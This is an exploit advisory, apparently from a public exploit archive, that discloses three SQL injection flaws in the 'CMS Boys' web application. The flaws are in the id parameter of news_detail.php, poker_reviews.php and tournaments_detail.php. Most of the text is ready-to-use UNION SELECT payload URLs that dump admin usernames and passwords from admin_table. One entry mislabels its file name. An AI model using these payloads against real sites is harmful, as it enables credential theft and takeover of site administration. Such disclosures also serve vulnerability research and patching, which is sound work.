CMS Boys suffers from multiple remote SQL injection vulnerabilities.
05fd1fbdd84777b0ce974aab67299328ee13b23066e9749a4c91666ffe90bf42
/*
Name : CMS BOYS (id) Multiple SQL Injection
WebSite : http://www.cmsboys.com/
Demo : http://www.cmsboys.com/democms/
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com
Greetz : Zuka , PR0f.SELLIM , Dyle , Achille Dark3r , geeksec.com
*/
# 1st :
File : news_detail.php , GET : id
[HOST]/[PATH]/news_detail.php?id=[INJECTION]
Exploit :
[HOST]/[PATH]/news_detail.php?id=-15+union+select+1,2,3,4,concat(admin_username,0x3a,admin_password)
+from+admin_table--
# 2nd :
File : news_detail.php , GET : id
[HOST]/[PATH]/poker_reviews.php?id=[INJECTION]
Exploit :
[HOST]/[PATH]/poker_reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat
(admin_username,0x3a,admin_password),12,13+from+admin_table--
# 3th :
File : tournaments_detail.php , GET : id
[HOST]/[PATH]/tournaments_detail.php?id=[INJECTION]
Exploit :
[HOST]/[PATH]/tournaments_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat
(admin_username,0x3a,admin_password)+from+admin_table--